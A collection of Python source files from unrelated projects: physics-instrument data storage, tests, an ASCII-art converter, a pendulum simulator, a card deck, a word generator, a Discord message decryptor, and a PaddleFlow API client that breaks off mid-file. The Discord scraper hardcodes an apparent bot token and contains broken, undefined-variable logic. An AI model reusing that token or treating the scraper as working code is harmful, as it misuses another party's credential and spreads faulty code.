#### File: DuCroy/ducroy/pmt_data.py ```python import h5py import numpy as np class PmtData: def __init__(self, serial, nominal_voltage=1000, nominal_gain=3e6): if serial == "": return self.filepath = "./{}.h5".format(serial) with h5py.File(self.filepath, "w") as file: file.attrs[u'serial'] = serial file.attrs[u'nominal_voltage'] = nominal_voltage file.attrs[u'nominal_gain'] = nominal_gain grp_analysis = file.create_group("analysis") grp_analysis.attrs[u'measured_nominal_gain'] = -1 grp_analysis.attrs[u'measured_nominal_gain_err'] = -1 grp_analysis.attrs[u'measured_nominal_voltage'] = -1 grp_analysis.attrs[u'measured_nominal_voltage_err'] = -1 @property def serial(self): retval = '' with h5py.File(self.filepath, "r") as file: retval = str(file.attrs[u'serial']) return retval @serial.setter def serial(self, value): with h5py.File(self.filepath, "r+") as file: file.attrs[u'serial'] = value @property def nominal_voltage(self): retval = '' with h5py.File(self.filepath, "r") as file: retval = file.attrs[u'nominal_voltage'] return retval @nominal_voltage.setter def nominal_voltage(self, value): with h5py.File(self.filepath, "r+") as file: file.attrs[u'nominal_voltage'] = value @property def nominal_gain(self): retval = '' with h5py.File(self.filepath, "r") as file: retval = file.attrs[u'nominal_gain'] return retval @nominal_gain.setter def nominal_gain(self, value): with h5py.File(self.filepath, "r+") as file: file.attrs[u'nominal_gain'] = value def _get_analysis_attr(self, key): retval = None with h5py.File(self.filepath, "r") as file: group = file[u'analysis'] retval = group.attrs[key] return retval def _set_analysis_attr(self, key, value): with h5py.File(self.filepath, "r+") as file: group = file[u'analysis'] group.attrs[key] = value @property def measured_nominal_voltage(self): return self._get_analysis_attr(u'measured_nominal_voltage') @measured_nominal_voltage.setter def measured_nominal_voltage(self, value): self._set_analysis_attr(u'measured_nominal_voltage', value) @property def measured_nominal_voltage_error(self): return self._get_analysis_attr(u'measured_nominal_voltage_err') @measured_nominal_voltage_error.setter def measured_nominal_voltage_error(self, value): self._set_analysis_attr(u'measured_nominal_voltage_err', value) @property def measured_nominal_gain(self): return self._get_analysis_attr(u'measured_nominal_gain') @measured_nominal_gain.setter def measured_nominal_gain(self, value): self._set_analysis_attr(u'measured_nominal_gain', value) @property def measured_nominal_gain_error(self): return self._get_analysis_attr(u'measured_nominal_gain_err') @measured_nominal_gain_error.setter def measured_nominal_gain_error(self, value): self._set_analysis_attr(u'measured_nominal_gain_err', value) def add_fit_results(self, hv, used_gaussians, nphe, q0, q0sigma, q1, q1sigma, gain, gain_err): dataset_groupname = "/analysis/{:.0f}V".format(hv) with h5py.File(self.filepath, "r+") as file: dataset_group = None if dataset_groupname not in file.keys(): dataset_group = file.create_group(dataset_groupname) else: dataset_group = file[dataset_groupname] dataset_group.attrs[u'nphe'] = nphe dataset_group.attrs[u'used_gaussians'] = used_gaussians dataset_group.attrs[u'q0'] = q0 dataset_group.attrs[u'q0sigma'] = q0sigma dataset_group.attrs[u'q1'] = q1 dataset_group.attrs[u'q1sigma'] = q1sigma dataset_group.attrs[u'gain'] = gain dataset_group.attrs[u'gain_err'] = gain_err def get_fit_results(self, hv): retval = dict() dataset_groupname = "/analysis/{:.0f}V".format(hv) with h5py.File(self.filepath, "r") as file: dataset_group = file[dataset_groupname] retval[u'nphe'] = file[dataset_groupname].attrs[u'nphe'] retval[u'used_gaussians'] = file[dataset_groupname].attrs[u'used_gaussians'] retval[u'q0'] = file[dataset_groupname].attrs[u'q0'] retval[u'q0sigma'] = file[dataset_groupname].attrs[u'q0sigma'] retval[u'q1'] = file[dataset_groupname].attrs[u'q1'] retval[u'q1sigma'] = file[dataset_groupname].attrs[u'q1sigma'] retval[u'gain'] = file[dataset_groupname].attrs[u'gain'] retval[u'gain_err'] = file[dataset_groupname].attrs[u'gain_err'] return retval def add_waveforms(self, hv, name, horizontal_interval, vertical_gain, samples, comment=''): dataset_groupname = "/raw_data/{0:.0f}V/{1}".format(hv, name) with h5py.File(self.filepath, "r+") as file: if dataset_groupname not in file.keys(): dataset_group = file.create_group(dataset_groupname) else: dataset_group = file[dataset_groupname] dataset_group.attrs[u'comment'] = comment dataset_group.attrs[u'horizontal_interval'] = horizontal_interval dataset_group.attrs[u'vertical_gain'] = vertical_gain dataset_group[u'data'] = samples def add_histogram(self, hv, x, y): dataset_groupname = "/analysis/{:.0f}V".format(hv) with h5py.File(self.filepath, "r+") as file: dataset_group = None if dataset_groupname not in file.keys(): dataset_group = file.create_group(dataset_groupname) else: dataset_group = file[dataset_groupname] dataset_group[u'histogram'] = (x, y) def get_histogram(self, hv): retval = None dataset_groupname = "/analysis/{:.0f}V/histogram".format(hv) with h5py.File(self.filepath, "r") as file: retval = np.asarray(file[dataset_groupname]) return retval def get_gains_and_voltages(self): hv = [] gain = [] with h5py.File(self.filepath, "r") as file: analysis = file[u'analysis'] for key in list(analysis.keys()): voltage = int(key.rstrip('V')) hv.append(voltage) gain.append(self.get_fit_results(voltage)['gain']) return (hv,gain) @staticmethod def read_from_file(filepath): retval = PmtData(serial = '') retval.filepath = filepath return retval ``` #### File: ducroy/tests/test_osci_control.py ```python import tempfile import unittest from unittest.mock import patch, MagicMock import numpy as np from ducroy.osci_control import Osci, OPEN_CMD class TestOsci(unittest.TestCase): @patch('visa.ResourceManager') def test_init(self, rm_mock): osci = Osci('1') # noqa rm_mock.assert_called_with("@py") @patch('visa.ResourceManager') def test_open_resource(self, rm_mock): ip = '1' osci = Osci(ip) osci.rm = MagicMock() osci._open_resource() osci.rm.open_resource.assert_called_with(OPEN_CMD.format(ip)) @patch('visa.ResourceManager') def test_write(self, rm_mock): ip = '1' osci = Osci(ip) osci.visa_if = MagicMock() osci.write("VDIV","C1","1","V") osci.visa_if.write.assert_called_with("C1:VDIV 1V") @patch('visa.ResourceManager') def test_read(self, rm_mock): ip = '1' osci = Osci(ip) osci.visa_if = MagicMock() osci.read("VDIV","C1") osci.visa_if.query.assert_called_with("C1:VDIV?") def test_variable_conversion(self): ip = '1' osci = Osci(ip) self.assertEqual(osci.decimal_to_visa_string(1e3),"1.00E+03") def test_write_read_waveforms(self): waveforms = np.random.random((10, 10)) comment, h_int, v_gain = 'a', 1, 2 with tempfile.NamedTemporaryFile(delete=True) as fobj: fp = fobj.name Osci.save_waveforms_to_file(fp, waveforms, h_int, v_gain, comment) file_data = Osci.read_waveforms_from_file(fp) assert np.allclose(waveforms, file_data['data']) assert file_data['horizontal_interval'] == h_int assert file_data['vertical_gain'] == v_gain assert file_data['comment'] == comment ```
{ "source": "8me/thepipe", "score": 2 }
#### File: thepipe/tests/test_provenance.py ```python import tempfile import unittest from thepipe import Provenance class TestProvenance(unittest.TestCase): def setUp(self): p = Provenance() p.reset() def test_activity(self): p = Provenance() activity_uuid = p.start_activity("test") assert p.current_activity.name == "test" p.finish_activity(activity_uuid) assert "test" in [b.name for b in p.backlog] assert len(p._activities) == 0 assert p.backlog[0].provenance["duration"] > 0 def test_finish_activity_with_wrong_uuid_raises(self): p = Provenance() p.start_activity("test") with self.assertRaises(ValueError): p.finish_activity("narf") def test_record_input_output(self): p = Provenance() p.start_activity("test") p.record_input("in.file") p.record_output("out.file") assert "in.file" == p.current_activity.provenance["input"][0]["url"] assert "out.file" == p.current_activity.provenance["output"][0]["url"] def test_record_input_sets_uuid_to_none_by_default(self): p = Provenance() p.start_activity("test") p.record_input("in.file") assert p.current_activity.provenance["input"][0]["uuid"] is None def test_record_output_sets_uuid_by_default(self): p = Provenance() p.start_activity("test") p.record_output("out.file") assert p.current_activity.provenance["output"][0]["uuid"] is not None def test_record_input_sets_uuid(self): p = Provenance() p.start_activity("test") p.record_input("out.file", uuid="abc") assert "abc" == p.current_activity.provenance["input"][0]["uuid"] def test_record_output_sets_uuid(self): p = Provenance() p.start_activity("test") p.record_output("out.file", uuid="abc") assert "abc" == p.current_activity.provenance["output"][0]["uuid"] def test_record_configuration(self): p = Provenance() p.start_activity("test") p.record_configuration({"a": 1}) assert p.current_activity.provenance["configuration"]["a"] == 1 def test_record_configuration_updates_instead_of_overwrites(self): p = Provenance() p.record_configuration({"a": 1}) assert p.current_activity.provenance["configuration"]["a"] == 1 p.record_configuration({"a": 2}) assert p.current_activity.provenance["configuration"]["a"] == 2 def test_record_configuration_updates_and_keeps_old_config_intact(self): p = Provenance() p.record_configuration({"a": 1}) assert p.current_activity.provenance["configuration"]["a"] == 1 p.record_configuration({"b": 2}) assert p.current_activity.provenance["configuration"]["b"] == 2 assert p.current_activity.provenance["configuration"]["a"] == 1 def test_parent_child_activities(self): p = Provenance() parent_uuid = p.current_activity.uuid first = p.start_activity("first") assert parent_uuid == p.current_activity._data["parent_activity"] p.finish_activity(first) second = p.start_activity("second") assert parent_uuid == p.current_activity._data["parent_activity"] p.finish_activity(second) assert first in p.current_activity._data["child_activities"] assert second in p.current_activity._data["child_activities"] def test_as_json(self): p = Provenance() p.start_activity("test") p.as_json() def test_as_json_with_non_serialisable_objects_doesnt_fail(self): p = Provenance() class Foo: pass uuid = p.start_activity("test") p.record_configuration({"a": Foo()}) p.finish_activity(uuid) p.as_json() def test_context_manager(self): p = Provenance() with p.activity("test"): p.record_input("whatever.file") assert "test" in [b.name for b in p.backlog] def test_outfile(self): p = Provenance() p.reset() fobj = tempfile.NamedTemporaryFile(delete=True) p.outfile = fobj.name p._export() assert open(fobj.name, "r").read() == p.as_json(indent=2) ```
{ "source": "8nhuman8/image2ascii", "score": 3 }
#### File: 8nhuman8/image2ascii/main.py ```python from json import load from PIL import Image from numpy import array, average from argparse import ArgumentParser, Namespace def get_average_luminance(image: Image) -> float: image_array = array(image) width, height = image_array.shape return average(image_array.reshape(width * height)) def convert_image_to_ascii(image_path: str, cols: int, scale: float, more_levels: bool) -> list: with open('config.json', 'r') as json_file: data = load(json_file) gray_scale_level_10 = data['gray_scale_level_10'] gray_scale_level_70 = data['gray_scale_level_70'] image = Image.open(image_path).convert('L') image_width, image_height = image.size[0], image.size[1] print(f'Input image dims: {image_width}x{image_height}') tile_width = image_width / cols tile_height = tile_width / scale rows = int(image_height / tile_height) print(f'Cols: {cols}, rows: {rows}') print(f'Tile dims: {tile_width}x{tile_height}') if cols > image_width or rows > image_height: raise IndexError('Image too small for specified rows or cols') ascii_image = [] for j in range(rows): y1 = int(j * tile_height) y2 = int((j + 1) * tile_height) if j == rows - 1: y2 = image_height ascii_image.append('') for i in range(cols): x1 = int(i * tile_width) x2 = int((i + 1) * tile_width) if i == cols - 1: x2 = image_width image_tile = image.crop((x1, y1, x2, y2)) average_luminance = int(get_average_luminance(image_tile)) if more_levels: gray_scale_value = gray_scale_level_70[int((average_luminance * 69) / 255)] else: gray_scale_value = gray_scale_level_10[int((average_luminance * 9) / 255)] ascii_image[j] += gray_scale_value return ascii_image def parse_args() -> Namespace: parser = ArgumentParser(description='This program converts an image into ASCII art.') parser.add_argument('-i', '--in', metavar='PATH', dest='image_path', type=str, required=True, help='Image path.') parser.add_argument('-s', '--scale', metavar='FLOAT', type=float, default=0.6, help='Scale value.') parser.add_argument('-o', '--out', metavar='PATH', dest='out_txt_path', type=str, default='out.txt', help='The path of the output file.') parser.add_argument('-c', '--cols', metavar='INT', type=int, default=50, help='The number of columns.') parser.add_argument('-ml', '--more-levels', action='store_true', help='More grayscale levels will be used.') return parser.parse_args() def create_ascii_image(args: Namespace) -> None: args = parse_args() ascii_image = convert_image_to_ascii(args.image_path, args.cols, args.scale, args.more_levels) with open(args.out_txt_path, 'w') as out_txt: for row in ascii_image: out_txt.write(row + '\n') print(f'ASCII art written to {args.out_txt_path}') if __name__ == '__main__': args = parse_args() create_ascii_image(args) ```
{ "source": "8nhuman8/pendulumious", "score": 3 }
#### File: pendulumious/src/main.py ```python from math import cos, sin from os import environ from platform import system from random import randrange from tkinter import Button, E, Frame, RAISED, SUNKEN, Tk, W from pygame import QUIT, init, quit as pygame_quit from pygame.display import flip, set_mode from pygame.draw import aaline, aalines, circle, line from pygame.event import get as get_events from pygame.time import Clock from utils import first_acceleration, second_acceleration from widgets_frame import WidgetsFrame WIDTH, HEIGTH = 500, 500 ORIGIN = (WIDTH // 2, HEIGTH // 3) add_offset = lambda x, y: (x + ORIGIN[0], ORIGIN[1] - y) pause = False first_frame_will_be_shown = True reset = False root = Tk() root.title('Pendulumious') root.resizable(False, False) embed = Frame(root, width=WIDTH, height=HEIGTH) embed.grid(row=0, column=0) widgets = WidgetsFrame(root, width=WIDTH, height=HEIGTH) widgets.grid(row=0, column=1) widgets.grid_propagate(False) def pause_button_behavior(): global pause if pause: pause_button.config(relief=RAISED) else: pause_button.config(relief=SUNKEN) pause = not pause def reset_button_behavior(): global reset reset = True pause_button = Button(widgets, text='Pause', command=pause_button_behavior) pause_button.config(relief=SUNKEN) pause_button.grid( row=10, column=0, columnspan=2, sticky=W + E, padx=(10,), pady=(10,) ) reset_button = Button(widgets, text='Reset', command=reset_button_behavior) reset_button.grid( row=10, column=2, columnspan=2, sticky=W + E, padx=(10,), pady=(10,) ) environ['SDL_WINDOWID'] = str(embed.winfo_id()) if system() == 'Windows': environ['SDL_VIDEODRIVER'] = 'windib' init() screen = set_mode((WIDTH, HEIGTH)) clock = Clock() gravity = None mass1, mass2 = None, None length1, length2 = None, None angle1, angle2 = randrange(0, 10), randrange(0, 10) anglular_velocity1, angular_velocity2 = 0, 0 trail1, trail2 = [], [] running = True def stop_running(): global running running = False root.protocol('WM_DELETE_WINDOW', stop_running) while running: if reset: angle1, angle2 = randrange(0, 10), randrange(0, 10) anglular_velocity1, angular_velocity2 = 0, 0 trail1, trail2 = [], [] pause_button.config(relief=SUNKEN) first_frame_will_be_shown = True reset = False if not pause: for event in get_events(): if event.type == QUIT: running = False gravity = widgets.gravity.get() fps = widgets.fps.get() mass1 = widgets.mass1.get() mass2 = widgets.mass2.get() length1 = widgets.length1.get() length2 = widgets.length2.get() bg_color = ( widgets.bg_color_r.get(), widgets.bg_color_g.get(), widgets.bg_color_b.get() ) dots_color = ( widgets.dots_color_r.get(), widgets.dots_color_g.get(), widgets.dots_color_b.get() ) trail1_color = ( widgets.trail1_color_r.get(), widgets.trail1_color_g.get(), widgets.trail1_color_b.get() ) trail2_color = ( widgets.trail2_color_r.get(), widgets.trail2_color_g.get(), widgets.trail2_color_b.get() ) joints_color = ( widgets.joints_color_r.get(), widgets.joints_color_g.get(), widgets.joints_color_b.get() ) use_fade1 = widgets.use_fade1.get() make_fade_bold1 = widgets.make_fade_bold1.get() use_fade2 = widgets.use_fade2.get() make_fade_bold2 = widgets.make_fade_bold2.get() fade_length1 = widgets.fade_length1.get() fade_length2 = widgets.fade_length2.get() angular_acceleration1 = first_acceleration( gravity, mass1, mass2, length1, length2, angle1, angle2, anglular_velocity1, angular_velocity2 ) angular_acceleration2 = second_acceleration( gravity, mass1, mass2, length1, length2, angle1, angle2, anglular_velocity1, angular_velocity2 ) x1 = int(length1 * sin(angle1)) y1 = int(-length1 * cos(angle1)) x2 = int(x1 + length2 * sin(angle2)) y2 = int(y1 - length2 * cos(angle2)) trail1.append(add_offset(x1, y1)) trail2.append(add_offset(x2, y2)) screen.fill(bg_color) aalines( screen, joints_color, False, [ ORIGIN, add_offset(x1, y1), add_offset(x2, y2) ] ) if len(trail1) > 1 and not use_fade1: aalines(screen, trail1_color, False, trail1) if len(trail2) > 1 and not use_fade2: aalines(screen, trail2_color, False, trail2) if use_fade1: while len(trail1) > fade_length1: trail1.pop(0) for i in range(len(trail1) - 1): r = widgets.trail1_color_r.get() + (len(trail1) - i) * 25 g = widgets.trail1_color_g.get() + (len(trail1) - i) * 25 b = widgets.trail1_color_b.get() + (len(trail1) - i) * 25 if r > 255: r = 255 if g > 255: g = 255 if b > 255: b = 255 start_position = (int(trail1[i][0]), int(trail1[i][1])) end_position = (int(trail1[i + 1][0]), int(trail1[i + 1][1])) if make_fade_bold1: line(screen, (r, g, b), start_position, end_position, mass1) else: aaline(screen, (r, g, b), start_position, end_position) if use_fade2: while len(trail2) > fade_length2: trail2.pop(0) for i in range(len(trail2) - 1): r = widgets.trail2_color_r.get() + (len(trail2) - i) * 25 g = widgets.trail2_color_g.get() + (len(trail2) - i) * 25 b = widgets.trail2_color_b.get() + (len(trail2) - i) * 25 if r > 255: r = 255 if g > 255: g = 255 if b > 255: b = 255 start_position = (int(trail2[i][0]), int(trail2[i][1])) end_position = (int(trail2[i + 1][0]), int(trail2[i + 1][1])) if make_fade_bold2: line(screen, (r, g, b), start_position, end_position, mass2) else: aaline(screen, (r, g, b), start_position, end_position) circle(screen, dots_color, ORIGIN, 5) circle(screen, dots_color, add_offset(x1, y1), mass1) circle(screen, dots_color, add_offset(x2, y2), mass2) flip() clock.tick(fps) anglular_velocity1 += angular_acceleration1 angular_velocity2 += angular_acceleration2 angle1 += anglular_velocity1 angle2 += angular_velocity2 if first_frame_will_be_shown: pause = True first_frame_will_be_shown = False root.update_idletasks() root.update() pygame_quit() quit() ```
{ "source": "8nhuman8/pyanitsa-simulation", "score": 4 }
#### File: pyanitsa-simulation/src/deck.py ```python from random import shuffle as rand_shuffle from card import Card class Deck: def __init__(self) -> None: self.cards = [] self._build() self._shuffle() def __len__(self) -> int: return len(self.cards) def show(self) -> None: print(self.cards) def draw_card(self) -> Card: return self.cards.pop() def _build(self) -> None: suits = ('\u2660', '\u2666', '\u2663', '\u2665') # ≡ ('♠', '♦', '♣', '♥') self.cards = [Card(value, suit, None) for value in range(2, 15) for suit in suits] def _shuffle(self) -> None: rand_shuffle(self.cards) ```
{ "source": "8nhuman8/rand-word", "score": 4 }
#### File: rand-word/randword/rand_name.py ```python from random import choice, sample from .utilities import get_data def name(count: int | None = None, gender: str | None = None) -> str | list[str]: ''' Returns a random first name or a list of them Args: count (int, optional): The number of names to be generated. Defaults to `None` gender (str, optional): Specifies the name of which gender will be generated. Defaults to `None` Returns: str | list[str]: A random first name if `count` is `None` or a list of random first names if `count` is not `None` ''' if gender == 'm': names = get_data('names', 'male_names') elif gender == 'f': names = get_data('names', 'female_names') else: male_names = get_data('names', 'male_names') female_names = get_data('names', 'female_names') names = male_names + female_names if count: return sample(names, count) else: return choice(names) def surname(count: int | None = None) -> str | list[str]: ''' Returns a random surname or a list of them Args: count (int, optional): The number of surnames to be generated. Defaults to `None` Returns: str | list[str]: A random surname if `count` is `None` or a list of surnames if `count` is not `None` ''' surnames = get_data('names', 'surnames') if count: return sample(surnames, count) else: return choice(surnames) def fullname(count: int | None = None, gender: int | None = None) -> str | list[str]: ''' Returns a random fullname or a list of them Args: count (int, optional): The number of fullnames to be generated. Defaults to `None` gender (str): Specifies the fullname of which gender will be generated. Defaults to `None` Returns: str | list[str]: A random fullname if `count` is `None` or a list of random fullnames if `count` is not `None` ''' if gender == 'm': names = get_data('names', 'male_names') elif gender == 'f': names = get_data('names', 'female_names') else: male_names = get_data('names', 'male_names') female_names = get_data('names', 'female_names') names = male_names + female_names surnames = get_data('names', 'surnames') if count: fullnames = [] random_names = sample(names, count) random_surnames = sample(surnames, count) for name, surname in zip(random_names, random_surnames): fullnames.append(f'{name} {surname}') return fullnames else: return f'{choice(names)} {choice(surnames)}' if __name__ == '__main__': print(name()) print(surname()) print(fullname()) ``` #### File: rand-word/randword/rand_word.py ```python from random import choice, sample from .utilities import get_data PARTS_OF_SPEECH = ['adj', 'adv', 'conj', 'interj', 'noun', 'prep', 'pron', 'verb'] def word(count: int | None = None, include_pos: list[str] | None = None, exclude_pos: list[str] | None = None, word_len: int | None = None, min_word_len: int = 1, max_word_len: int | None = None, starts_with: str | None = None, ends_with: str | None = None, pattern: str | None = None) -> str | list[str]: ''' Returns a random English word or a list of words Abbreviation "pos" means "part of speech" Args: count (int, optional): The number of words to be generated. Defaults to None. include_pos (list of str, optional): List of parts of speech that will be included in the generation. Defaults to `None` exclude_pos (list of str, optional): List of parts of speech that will be excluded in the generation. Defaults to `None` word_len (int, optional): Specifies the length of a word. Ignores the `min_word_len` and `max_word_len` parameters. Defaults to `None` min_word_len (int, optional): The minimum word length. Defaults to `1` max_word_len (int, optional): The maximum word length. Defaults to `None` starts_with (str, optional): The pattern with which the word begins. Defaults to `None` ends_with (str, optional): The pattern with which the word ends. Defaults to `None` pattern (str, optional): The pattern that should be contained in the word. Defaults to `None` Returns: str | list[str]: A random English word if `count` is `None` or a list of them if `count` is not `None` Raises: IndexError: If the word was not found or if the desired number of words was not found ''' if not include_pos: include_pos = PARTS_OF_SPEECH if exclude_pos: parts_of_speech = list(set(include_pos) - set(exclude_pos)) else: parts_of_speech = include_pos words = [] for part_of_speech in parts_of_speech: pos_words = get_data('parts_of_speech', part_of_speech) words.extend(pos_words) if max_word_len: filtered_words = list(filter(lambda word: min_word_len <= len(word) <= max_word_len, words)) else: filtered_words = list(filter(lambda word: min_word_len <= len(word), words)) if word_len: filtered_words = list(filter(lambda word: word_len == len(word), words)) if starts_with: filtered_words = list(filter(lambda word: word.startswith(starts_with), filtered_words)) if ends_with: filtered_words = list(filter(lambda word: word.endswith(ends_with), filtered_words)) if pattern: filtered_words = list(filter(lambda word: pattern in word, filtered_words)) if count: INDEX_ERROR_DESCRIPTION = 'The desired number of words was not found' if not filtered_words: raise IndexError(INDEX_ERROR_DESCRIPTION) try: final_words = sample(filtered_words, count) except ValueError: raise IndexError(INDEX_ERROR_DESCRIPTION) return final_words else: if not filtered_words: raise IndexError('The word was not found') return choice(filtered_words) if __name__ == '__main__': print(word()) ```
{ "source": "8nhuman8/space-time-replacement", "score": 3 }
#### File: 8nhuman8/space-time-replacement/main.py ```python import cv2 def extract_images(path_in: str, path_out: str = 'frames'): vidcap = cv2.VideoCapture(path_in) if not vidcap.isOpened(): print('Error opening video') count = 0 while vidcap.isOpened(): status, image = vidcap.read() if not status: print('Video file finished. Total Frames:', int(vidcap.get(cv2.CAP_PROP_FRAME_COUNT))) break cv2.imwrite(rf'{path_out}\frame{count}.jpg', image) count += 1 if __name__== '__main__': extract_images('videos/sample.mp4') ```
{ "source": "8o7wer/baropy", "score": 3 }
#### File: baropy/baropy/__init__.py ```python import time import socket import sys import os from threading import Thread class Barotrauma: def __init__(self, stdinpath, udspath, writetimeout=0.1, responsetime=0.1, buffersize=128): self.stdinpath = stdinpath self.udspath = udspath self.writetimeout = writetimeout self.responsetime = 0.3 self.udsbuffer = Udsbuffer(size = buffersize) self.__start_uds_thread() def __uds_thread(self): sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) try: sock.connect(self.udspath) except Exception as error: raise Exception("Error connecting to unix domain socket: " + repr(error)) while True: data = "" while True: # Recieve exactly one line of data data = data + sock.recv(1).decode() if data.endswith("\n"): break self.udsbuffer.add(data.strip("\n")) def __start_uds_thread(self): thread = Thread(target=self.__uds_thread) thread.start() def send_command(self, command, args=[], followup=[]): try: with open(self.stdinpath, "w") as file: file.write(command + " ".join(args)) for string in followup: time.sleep(self.writetimeout) file.write(string) except Exception as error: raise Exception("Error on writing to pipefile: " + repr(error)) def response(self, command, args=[]): self.udsbuffer.flush() self.send_command(command, args) time.sleep(self.responsetime) response = self.udsbuffer.buffer index = [i for i, s in enumerate(response) if command in s][0] #Get index of command in game output response = response[index+1:] #trim buffer array so that its only text after the command in game output return response def ban_name(self, name, reason, duration): self.send_command("ban", [name], [reason, duration]) def ban_ip(self, ip, reason, duration): self.send_command("banip", [ip], [reason, duration]) def get_players(self): responses = self.response("clientlist") responses = [i for i in responses if i.startswith("-")] clients = [] for response in responses: response = response[2:] if(response.find("playing") == -1): name = response[response.find(":")+2:response.rfind(",")] else: name = response[response.find(":")+2:response.find("playing")-1] id = response[:response.find(":")] ip = response[response.rfind(",")+2:].strip() clients.append(Player(self, name, id, ip)) return clients def get_player_by_name(self, name): #returns -1 if a client cant be found clients = self.get_players() for client in clients: if client.name.lower() == name.lower(): return client return -1 def get_player_by_ip(self, ip): #same as above clients = self.get_players() for client in clients: if client.ip == ip: return ip return -1 def get_player_by_id(self, id): #Id must be a string clients = self.get_players() for client in clients: if client.id == id: return client return -1 class Udsbuffer: #Holds the buffer for incoming lines of data from the game server def __init__(self, size=128): self.buffer = [] self.size = size def add(self, data): #Please use this function insteada of udsbuffer.append.(Data) as this function limits the size of the list self.buffer.append(data) if len(self.buffer) > self.size: del self.buffer[self.size:] def flush(self): self.buffer.clear() class Player: def __init__(self, barotrauma, name, id, ip): self.name = name self.id = id self.ip = ip self.barotrauma = barotrauma def ban_name(self, reason, duration): barotrauma.ban_name(self.name, reason, duration) def ban_ip(self, reason, duration): barotrauma.ban_name(self.ip, reason, duration) def give_rank(self, rank): barotrauma.send_command(give_rank, [id], [rank]) def give_permission(self, permission): barotrauma.send_command(give_rank, [id], [permission]) ```
{ "source": "8o-COLLECTIVE/cobalt8", "score": 3 }
#### File: cobalt8/cobalt8/scraper.py ```python import discord import hashlib from .aes import AES # Create an anonymous discord client, which retrieves the content of the selected channel and then dies. def scrape(): print("Establishing Discord client, please hold...") client = discord.Client() client.run('ODAxMjE4ODI4MDA0MjI5MTIw.YAdfLg._IxT1qxs3AaFFig-7e6GwC50c9s') @client.event async def on_ready(): channel = get_channel key = input("\nConversation key: ") aesobj = AES(bytearray.fromhex(key)) key_hash = hashlib.md5(bytearray.fromhex(key)).hexdigest() print("\nLoading conversation...\n") if channel is not None: multi_decrypt(key_hash) else: print("\nFailed to find channel with provided ID") toScrape = input("\nDo you want to try again? [Y or N] ") if(toScrape.lower() == "y"): await on_ready() await client.close() def get_channel(): to_scrape = input("\nInput channel ID to be scraped [or press enter for #cobalt]: ") if len(to_scrape) == 0: to_scrape = 813872961656193045 try: channel = client.get_channel(int(to_scrape)) except: print("\nIt would appear that key is invalid.") pass return channel def decrypt_text(text): format_message = lambda datetime, author, dmessage: "[{}] {}: {}".format(datetime, author, dmessage) text = item.content text = text[32:] iv = text[:32] text = text[32:] dmessage = aesobj.decrypt_ctr(bytearray.fromhex(text), bytearray.fromhex(iv)).decode('ascii') messagef = format_message(str(item.created_at), item.author.name, dmessage) return messagef async def multi_decrypt(key_hash): messages = await channel.history().flatten() stack = [decrypt_text(item.content) for item in messages if item.content.startswith(key_hash)] for x in range(len(stack)): print(stack.pop()) ```
{ "source": "8olio8/PaddleFlow", "score": 2 }
#### File: client/paddleflow/client.py ```python import json from urllib import parse from paddleflow.common.exception.paddleflow_sdk_exception import PaddleFlowSDKException from paddleflow.common import api from paddleflow.job import JobServiceApi from paddleflow.log import LogServiceApi from paddleflow.user import UserServiceApi from paddleflow.queue import QueueServiceApi from paddleflow.fs import FSServiceApi from paddleflow.run import RunServiceApi from paddleflow.pipeline import PipelineServiceApi from paddleflow.utils import api_client from paddleflow.cluster import ClusterServiceApi from paddleflow.flavour import FlavouriceApi class Client(object): """Client class """ def __init__(self, paddleflow_server, username, password, paddleflow_port=8080): """ :param paddleflow_server: the address of paddleflow server :type paddleflow_server: str :param fs_server: the address of fs server :type fs_server:str """ self.paddleflow_server = None self.token = None self.user_id = username self.header = None self.password = password if paddleflow_server is None or paddleflow_server.strip() == "": raise PaddleFlowSDKException("InvalidServer", "paddleflow server should not be none or empty") self.paddleflow_server = "http://%s:%s" % (paddleflow_server, paddleflow_port) def login(self, user_name, password): """ :param user_name: :type user_name: str :param passWord :type password: str """ if self.paddleflow_server is None: raise PaddleFlowSDKException("InvalidClient", "client should be initialized") if user_name is None or user_name.strip() == "": raise PaddleFlowSDKException("InvalidUser", "user_name should not be none or empty") if password is None or password.strip() == "": raise PaddleFlowSDKException("InvalidPassWord", "password should not be none or empty") body = { "username": user_name, "password": password } response = api_client.call_api(method="POST", url=parse.urljoin(self.paddleflow_server, api.PADDLE_FLOW_LOGIN), json=body) if not response: raise PaddleFlowSDKException("Connection Error", "login failed due to HTTPError") data = json.loads(response.text) if 'message' in data: return False, data['message'] self.user_id = user_name self.password = password self.header = { "x-pf-authorization": data['authorization'] } return True, None def pre_check(self): """ precheck to check header """ if not self.user_id or not self.header: raise PaddleFlowSDKException("InvalidOperator", "should login first") def add_user(self, user_name, password): """ :param user_name: :type user_name: str :param passWord :type password: str :return true, None if success false, message if failed """ self.pre_check() if user_name is None or user_name.strip() == "": raise PaddleFlowSDKException("InvalidUser", "user_name should not be none or empty") if password is None or password.strip() == "": raise PaddleFlowSDKException("InvalidPassWord", "password should not be none or empty") return UserServiceApi.add_user(self.paddleflow_server, user_name, password, self.header) def del_user(self, user_name): """ :param user_name: :type user_name: str :param passWord :type password: str :return :true,None if success :false, message if failed """ self.pre_check() if user_name is None or user_name.strip() == "": raise PaddleFlowSDKException("InvalidUser", "user_name should not be none or empty") return UserServiceApi.del_user(self.paddleflow_server, user_name, self.header) def list_user(self, maxsize=100): """list user info""" self.pre_check() return UserServiceApi.list_user(self.paddleflow_server, self.header, maxsize) def update_password(self, name, password): """update name's password""" self.pre_check() if name is None or name.strip() == "": raise PaddleFlowSDKException("InvalidUser", "user_name should not be none or empty") if password is None or password.strip() == "": raise PaddleFlowSDKException("InvalidPassWord", "password should not be none or empty") return UserServiceApi.update_password(self.paddleflow_server, name, password, self.header) def add_queue(self, name, namespace, clusterName, maxResources, minResources=None, schedulingPolicy=None, location=None, quotaType=None): """ add queue""" self.pre_check() if namespace is None or namespace.strip() == "": raise PaddleFlowSDKException("InvalidNameSpace", "namesapce should not be none or empty") if name is None or name.strip() == "": raise PaddleFlowSDKException("InvalidQueueName", "queuename should not be none or empty") if clusterName is None or clusterName.strip() == "": raise PaddleFlowSDKException("InvalidQueueClusterName", "clustername should not be none or empty") if maxResources is None or maxResources['cpu'] is None or maxResources['mem'] is None: raise PaddleFlowSDKException("InvalidQueueMaxResources", "queue maxResources cpu or mem should not be none or empty") return QueueServiceApi.add_queue(self.paddleflow_server, name, namespace, clusterName, maxResources, minResources, schedulingPolicy, location, quotaType, self.header) def grant_queue(self, username, queuename): """ grant queue""" self.pre_check() if username is None or username.strip() == "": raise PaddleFlowSDKException("InvalidName", "name should not be 